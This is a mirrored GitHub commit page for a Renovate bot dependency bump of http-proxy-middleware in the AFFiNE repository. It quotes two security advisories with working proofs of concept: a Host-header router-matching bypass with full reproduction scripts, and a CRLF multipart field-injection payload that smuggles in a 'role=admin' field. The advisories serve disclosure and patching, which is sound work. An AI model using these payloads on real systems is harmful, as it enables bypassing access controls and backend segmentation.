mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-01 17:50:50 +08:00
chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) |  |  | --- ### http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass [CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) / [GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) <details> <summary>More information</summary> #### Details ##### Summary `http-proxy-middleware` documents `router` proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted `Host` header that is only a superstring match for a configured host+path key can still route a request to an unintended backend. ##### Details Tested code state: - validated on tag `v4.0.0-beta.5` - corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358` Relevant code locations: - `src/router.ts` - `src/http-proxy-middleware.ts` Affected public API: - `createProxyMiddleware({ router: { 'host/path': 'http://target' } })` Code explanation: When a proxy-table router key contains `/`, `getTargetFromProxyTable()` concatenates attacker-controlled `req.headers.host` and `req.url` into a single `hostAndPath` string, then accepts the route if: ```ts hostAndPath.indexOf(key) > -1 ``` That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is: ```txt localhost:3000/api ``` but the attacker-controlled host is: ```txt evillocalhost:3000 ``` and the request path is: ```txt /api ``` The concatenated attacker-controlled string: ```txt evillocalhost:3000/api ``` still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host. Exploit path: 1. the application enables the documented proxy-table `router` feature with at least one host+path rule 2. an external attacker sends an ordinary HTTP request with a crafted `Host` header 3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection before proxying 4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string through substring matching 5. the request is proxied to the wrong backend ##### PoC Create these files in the same working directory and run: ```bash bash ./run.sh ``` ##### File: `run.sh` ```bash #!/usr/bin/env bash set -euo pipefail SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" REPO_URL="https://github.com/chimurai/http-proxy-middleware.git" REPO_REF="v4.0.0-beta.5" WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")" TARGET_REPO_DIR="${WORKDIR}/repo" REPRO_DIR="${WORKDIR}/reproduction" IMAGE_TAG="http-proxy-middleware-router-bypass-poc" cleanup() { rm -rf "${WORKDIR}" } trap cleanup EXIT echo "[a3] cloning target repository" git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}" git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}" mkdir -p "${REPRO_DIR}" cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile" cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs" echo "[a3] building reproduction image" docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}" echo "[a3] running verification" docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs ``` ##### File: `Dockerfile` ```Dockerfile FROM node:22-bullseye WORKDIR /work COPY repo/package.json repo/yarn.lock /work/repo/ RUN corepack enable \ && cd /work/repo \ && yarn install --frozen-lockfile COPY repo /work/repo RUN cd /work/repo && yarn build COPY reproduction /work/reproduction ``` ##### File: `verify.mjs` ```js import http from 'node:http'; import fs from 'node:fs'; import assert from 'node:assert/strict'; import { createProxyMiddleware } from '/work/repo/dist/index.js'; const ROUTER_KEY = 'localhost:3000/api'; const CRAFTED_HOST = 'evillocalhost:3000'; function listen(server, port) { return new Promise((resolve) => { server.listen(port, '127.0.0.1', () => resolve()); }); } function close(server) { return new Promise((resolve, reject) => { server.close((err) => { if (err) { reject(err); return; } resolve(); }); }); } function request(path, host) { return new Promise((resolve, reject) => { const req = http.request( { host: '127.0.0.1', port: 3000, path, method: 'GET', headers: { Host: host, }, }, (res) => { let data = ''; res.setEncoding('utf8'); res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { resolve({ statusCode: res.statusCode, body: data }); }); }, ); req.on('error', reject); req.end(); }); } const defaultBackend = http.createServer((req, res) => { res.end('DEFAULT'); }); const secretBackend = http.createServer((req, res) => { res.end('SECRET'); }); const proxyMiddleware = createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); const proxyServer = http.createServer((req, res) => { proxyMiddleware(req, res, () => { res.statusCode = 404; res.end('NO_PROXY'); }); }); try { assert.ok(fs.existsSync('/work/repo/dist/index.js')); assert.ok(fs.existsSync('/work/reproduction/verify.mjs')); await listen(defaultBackend, 3101); await listen(secretBackend, 3102); await listen(proxyServer, 3000); console.log('STEP start-services ok'); const baseline = await request('/api', 'safe.example:3000'); assert.equal(baseline.statusCode, 200); assert.equal(baseline.body, 'DEFAULT'); console.log(`STEP baseline-route body=${baseline.body}`); const crafted = await request('/api', CRAFTED_HOST); assert.equal(crafted.statusCode, 200); assert.equal(crafted.body, 'SECRET'); assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]); console.log(`STEP crafted-route body=${crafted.body}`); console.log('RESULT reproduced host_header_injection router substring match bypass'); } finally { await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]); } ``` This PoC starts: - one default backend returning `DEFAULT` - one alternate backend returning `SECRET` - one proxy using: ```js createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); ``` It then sends: 1. a baseline request to `/api` with `Host: safe.example:3000` 2. a crafted request to `/api` with `Host: evillocalhost:3000` Observed result from the validated PoC: - baseline request: `STEP baseline-route body=DEFAULT` - crafted request: `STEP crafted-route body=SECRET` - success marker: `RESULT reproduced host_header_injection router substring match bypass` The PoC is considered successful only if: 1. the baseline request stays on the default backend 2. the crafted request reaches the alternate backend 3. the crafted host is not equal to the configured router host ##### Impact This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted `Host` header. #### Severity - CVSS Score: 6.9 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj) - [https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody` [CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) / [GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) <details> <summary>More information</summary> #### Details ##### Summary `fixRequestBody()` is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the **outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the body with `handlerFormDataBodyData()`, which interpolates each `req.body` key and value directly into the multipart wire format **without neutralizing CR/LF**: ```js // dist/handlers/fix-request-body.js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); let str = ''; for (const [key, value] of Object.entries(data)) { str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`; } } ``` A `\r\n` inside a value (or key) lets an attacker close the current part and inject an **entirely new form part**. Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on `req.body` is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary. By contrast, the sibling output branches are safe: `application/json` uses `JSON.stringify` (escapes control chars) and `application/x-www-form-urlencoded` uses `querystring.stringify` (percent-encodes). Only the multipart branch lacks escaping. ##### Preconditions All three must hold; this narrows real-world exposure and is the basis for `AC:H`: 1. The proxy app populates `req.body` with a **non-multipart** parser (`express.urlencoded`, `express.json`, or text) so an injected boundary in a value is **not** split on input. 2. The proxied (outgoing) request is sent as **`multipart/form-data`** (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs. 3. The app calls `fixRequestBody` (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key. > Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is generally **not** exploitable for a *new-field* injection, because the proxy's multipart parser already splits the injected boundary, so `req.body` and the backend agree. The desync specifically requires a non-multipart input parser. ##### Impact When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend: - **Validation / access-control bypass** bypass gateway-side field checks (demonstrated below: a gateway that forbids `role=admin` is bypassed; backend grants admin). - **Parameter tampering** add or overwrite fields the backend trusts (IDs, flags, prices). - **File-part injection** inject a `filename="..."` part into the upstream multipart stream. ##### Proof of Concept ```js // npm i http-proxy-middleware@4.0.0 (Node ESM: save as minimal.mjs) import { fixRequestBody } from 'http-proxy-middleware'; // `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it. // The attacker sent user=alice%0D%0A--BB%0D%0A... so this ONE field's value holds CRLF: const req = { readableLength: 0, body: { user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--' }}; // Minimal stand-in for the outgoing proxy request; capture what gets written. const out = []; const proxyReq = { h: { 'content-type': 'multipart/form-data; boundary=BB' }, getHeader(n){ return this.h[n.toLowerCase()]; }, setHeader(n,v){ this.h[n.toLowerCase()] = v; }, write(d){ out.push(Buffer.from(d)); }, }; fixRequestBody(proxyReq, req); // library rebuilds the multipart body console.log(Buffer.concat(out).toString()); ``` Output: one input field becomes **two** parts; `role=admin` was injected via the unescaped CRLF: ``` --BB Content-Disposition: form-data; name="user" alice --BB Content-Disposition: form-data; name="role" <-- injected part; never present in req.body's keys admin --BB-- ``` `req.body` had a single key (`user`), so any gateway policy checking `req.body.role` passes, yet the backend's multipart parser receives `role=admin`. On the wire the attacker simply sends, as `application/x-www-form-urlencoded`: `user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--` ##### Remediation Neutralize CR/LF (and `"`) in keys/values before interpolation, or build the body with a real multipart encoder (e.g. `FormData` / `form-data`) instead of string concatenation. Minimal fix: ```js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); const bad = /[\r\n]/; let str = ''; for (const [key, value] of Object.entries(data)) { const v = String(value); if (bad.test(key) || bad.test(v)) { throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value'); } str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`; } } ``` (Reject is preferable to silent stripping, to avoid masking malicious input.) #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm) - [https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>chimurai/http-proxy-middleware (http-proxy-middleware)</summary> ### [`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7) #### What's Changed - fix(fixRequestBody): harden form-data stringification by [@​chimurai](https://redirect.github.com/chimurai) in [#​1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259) - chore(package.json): v3.0.7 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7> ### [`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6) #### What's Changed - fix(types): fix Logger type by [@​chimurai](https://redirect.github.com/chimurai) in [#​1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104) - fix(fixRequestBody): support text/plain by [@​knudtty](https://redirect.github.com/knudtty) in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105) - build(prettier): improve prettier setup by [@​chimurai](https://redirect.github.com/chimurai) in [#​1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108) - chore(deps): fix punycode node deprecation warning by [@​chimurai](https://redirect.github.com/chimurai) in [#​1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110) - build(codespaces): add devcontainer.json by [@​chimurai](https://redirect.github.com/chimurai) in [#​1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116) - ci(github-action): ci.yml add node v24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118) - chore(package): upgrade to jest v30 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122) - chore(examples): upgrade deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124) - chore(package): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125) - test(websocket): fix ws import by [@​chimurai](https://redirect.github.com/chimurai) in [#​1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126) - chore(refactor): use `node:` protocol imports by [@​chimurai](https://redirect.github.com/chimurai) in [#​1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127) - ci(node24): pin node24 due to TLS issue with mockttp by [@​chimurai](https://redirect.github.com/chimurai) in [#​1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137) - docs(recipes/pathRewrite.md): fix comment by [@​DEBargha2004](https://redirect.github.com/DEBargha2004) in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138) - chore(deps): update actions/checkout action to v5 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140) - fix(error-response-plugin): sanitize input by [@​chimurai](https://redirect.github.com/chimurai) in [#​1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141) - chore(package.json): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143) - chore: add context7.json by [@​chimurai](https://redirect.github.com/chimurai) in [#​1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144) - build(eslint): update eslint.config.mjs by [@​chimurai](https://redirect.github.com/chimurai) in [#​1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145) - ci(github workflow): harden github workflows by [@​chimurai](https://redirect.github.com/chimurai) in [#​1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147) - ci(ci.yml): unpin node 24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148) - docs(recipes): fix servers.md http.createServer example by [@​hacklschorsch](https://redirect.github.com/hacklschorsch) in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) - ci: publish with oidc by [@​chimurai](https://redirect.github.com/chimurai) in [#​1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158) - test(types.spec.ts): add type check when req or res are 'any' by [@​chimurai](https://redirect.github.com/chimurai) in [#​1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161) - chore(package.json): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164) - chore(package.json): eslint v10 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166) - chore(package.json): bump dev-deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171) - docs(examples): fix websocket example by [@​chimurai](https://redirect.github.com/chimurai) in [#​1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170) - build(vscode): use workspace version of TypeScript by [@​chimurai](https://redirect.github.com/chimurai) in [#​1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173) - fix(router): harden proxy-table matching by [@​chimurai](https://redirect.github.com/chimurai) in [#​1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254) - chore(package.json): v3.0.6 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256) #### New Contributors - [@​knudtty](https://redirect.github.com/knudtty) made their first contribution in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - [@​DEBargha2004](https://redirect.github.com/DEBargha2004) made their first contribution in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - [@​hacklschorsch](https://redirect.github.com/hacklschorsch) made their first contribution in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
This commit is contained in:
@@ -25371,8 +25371,8 @@ __metadata:
|
||||
linkType: hard
|
||||
|
||||
"http-proxy-middleware@npm:^3.0.5":
|
||||
version: 3.0.5
|
||||
resolution: "http-proxy-middleware@npm:3.0.5"
|
||||
version: 3.0.7
|
||||
resolution: "http-proxy-middleware@npm:3.0.7"
|
||||
dependencies:
|
||||
"@types/http-proxy": "npm:^1.17.15"
|
||||
debug: "npm:^4.3.6"
|
||||
@@ -25380,7 +25380,7 @@ __metadata:
|
||||
is-glob: "npm:^4.0.3"
|
||||
is-plain-object: "npm:^5.0.0"
|
||||
micromatch: "npm:^4.0.8"
|
||||
checksum: 10/83c1956be6451a5f4a2f3c7b3d84085dbd47e1efb5bb684c1ed668a6606c18c7c07be823b0dbba1326955b64cf88de2672492940b0b48d140215fbdb06105c9a
|
||||
checksum: 10/a44135de721e55517b0fca596855e1e4da92b5fdad247425b4253a345fface37b2a800fcfe37dc28863e9021d8c56cf9cb33ebd20d63c9eca6918a46b39082d4
|
||||
languageName: node
|
||||
linkType: hard
|
||||
|
||||
|
||||
Reference in New Issue
Block a user